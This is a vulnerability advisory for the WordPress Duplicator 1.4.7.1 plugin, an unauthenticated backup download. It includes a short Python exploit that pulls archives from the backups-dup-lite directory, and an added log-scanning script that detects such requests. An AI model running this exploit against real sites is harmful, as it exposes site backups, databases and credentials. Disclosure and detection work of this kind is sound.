WordPress Duplicator 1.4.7.1 Backup Disclosure
WordPress Duplicator plugin version 1.4.7.1 suffers from a backup disclosure vulnerability.
## Title: WordPress Plugin Duplicator 1.4.7.1 - Unauthenticated Backup Download
## Author: nu11secur1ty
## Date: 08.08.2022
## Vendor: https://wordpress.org/
## Software: https://wordpress.org/plugins/duplicator/
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin/1.4.7.1

## Description:
The WordPress Plugin Duplicator 1.4.7.1 suffers from Unauthenticated
Backup Download, after an update from the 1.4.7 version.
The attacker can download all archive information from the system by
using this vulnerability!

Status: CRITICAL

[+] Exploit:

```python
#!/usr/bin/python
# Author nu11secur1ty
import requests
import time

vulnerableURL = "http://pwned_host.com/wordpress/wp-content/backups-dup-lite/"
archive=input("Give the name of the archive...\n")
response = requests.get(vulnerableURL)
time.sleep(5)
open(archive, "wb").write(response.content)
print("Right now, you just downloaded the secret archive =)\n")
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin/1.4.7.1)

## Proof and Exploit:
[href](https://streamable.com/ee11bg)

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>
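
On the server side, the request made by the script above appears in the web server access log as a successful GET under `wp-content/backups-dup-lite/`. The following is an added example, not part of the original advisory: it scans access log lines for such hits, and the combined log format, the sample lines and the function name are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Directory name taken from the advisory; everything else is an assumption.
BACKUP_PREFIX = "/wp-content/backups-dup-lite/"

# Apache/nginx "combined" access log format (assumed).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def find_backup_hits(lines):
    """Return {client_ip: [(timestamp, path, bytes_sent), ...]} for
    successful (2xx) requests under the Duplicator backup directory."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        # Drop the query string and decode %xx so encoded paths still match.
        path = unquote(m["path"].split("?", 1)[0])
        # Substring match: WordPress may live in a subdirectory (/wordpress/).
        if BACKUP_PREFIX not in path.lower():
            continue
        if not m["status"].startswith("2"):
            continue  # 403/404: the server refused or nothing was served
        size = 0 if m["size"] == "-" else int(m["size"])
        hits[m["ip"]].append((m["ts"], path, size))
    return dict(hits)

# Constructed sample log lines (documentation-range IPs, made-up file name).
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Aug/2022:10:01:02 +0000] "GET /wordpress/wp-content/backups-dup-lite/ HTTP/1.1" 200 1843 "-" "python-requests/2.28.1"',
    '203.0.113.7 - - [08/Aug/2022:10:01:09 +0000] "GET /wordpress/wp-content/backups-dup-lite/example_archive.zip HTTP/1.1" 200 52428800 "-" "python-requests/2.28.1"',
    '198.51.100.4 - - [08/Aug/2022:10:05:00 +0000] "GET /wordpress/wp-content/backups-dup-lite/ HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [08/Aug/2022:10:06:00 +0000] "GET /wordpress/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, entries in find_backup_hits(SAMPLE_LOG).items():
        for ts, path, size in entries:
            print(f"{ip} [{ts}] {path} ({size} bytes)")
```

Any 2xx response under that directory to a client that is not a logged-in administrator means the backup directory is being served; a large byte count on an archive file indicates a backup actually left the server.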